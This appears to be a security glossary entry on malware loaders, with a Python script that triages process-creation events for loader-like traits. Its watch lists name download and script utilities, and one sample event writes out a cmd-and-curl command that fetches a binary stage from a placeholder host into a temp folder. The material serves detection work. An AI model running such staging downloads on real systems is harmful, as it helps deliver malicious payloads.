
Netcrook


WIKICROOK

Malware loader

A staging tool that delivers or decrypts the next payload in an intrusion.

A malware loader is a staging tool used to deliver, decrypt, or unpack the next payload in an intrusion. It is often the first malicious component that runs after initial access, but its job is usually temporary: prepare the system for a more capable implant such as a RAT, ransomware, or data-stealing tool.

Loaders matter because they help attackers evade detection. By keeping the final payload encrypted, fetching it later, or launching it in memory, a loader can reduce the value of simple file hashes and disk scanning. In real attacks, loaders may use legitimate Windows utilities, script interpreters, or browser-to-shell handoffs to make activity look normal. Defenders look for suspicious command execution, unusual child processes, network retrieval of binaries, and memory-resident payloads. Stopping the loader early can break the whole attack chain before the operator reaches interactive control.
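
The process-level signals named above (unusual child processes, network retrieval of binaries) can be checked against process-creation events, as in this added example, which is not Netcrook's code. The watch lists, event field names and sample events are constructed assumptions; memory-resident payloads need memory telemetry and are outside what these logs show.

```python
import re
from ntpath import basename  # Windows path rules on any host OS

# Illustrative watch lists (assumptions, not exhaustive); tune per environment.
HANDOFF_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe"}
LAUNCHERS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe",      # interpreters
             "certutil.exe", "bitsadmin.exe", "rundll32.exe", "curl.exe"}  # utilities
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
BINARY_EXT_RE = re.compile(r"\.(exe|dll|bin|dat|ps1|hta|vbs)(\?|$)", re.I)

def triage(event):
    """Return the loader-like traits found in one process-creation event."""
    parent = basename(event["parent_image"]).lower()
    child = basename(event["image"]).lower()
    reasons = []
    if child not in LAUNCHERS:
        return reasons
    if parent in HANDOFF_PARENTS:  # document or browser handing off to a shell
        reasons.append("unusual_child_process")
    urls = URL_RE.findall(event["command_line"])
    if urls:
        reasons.append("network_retrieval")
        if any(BINARY_EXT_RE.search(u) for u in urls):
            reasons.append("retrieves_binary")
    return reasons

def hunt(events):
    """Map event id -> traits, keeping only events with at least one trait."""
    return {e["id"]: r for e in events if (r := triage(e))}

# Constructed sample events; field names are hypothetical, not a real log schema.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r'"WINWORD.EXE" /n "C:\Users\a\Documents\report.docx"'},
    {"id": 2, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Users\a\AppData\Local\Temp\x.ps1"},
    {"id": 3, "parent_image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c curl.exe -s -o %TEMP%\stage.bin http://files.example.test/stage.bin"},
    {"id": 4, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "command_line": r"curl.exe -O https://docs.example.test/readme.txt"},
]

if __name__ == "__main__":
    for event_id, reasons in hunt(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(reasons))
```

Event 4 shows why a single trait is weak evidence: an administrator fetching a text file trips `network_retrieval` alone, while the browser-to-shell handoff in event 3 stacks all three traits.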
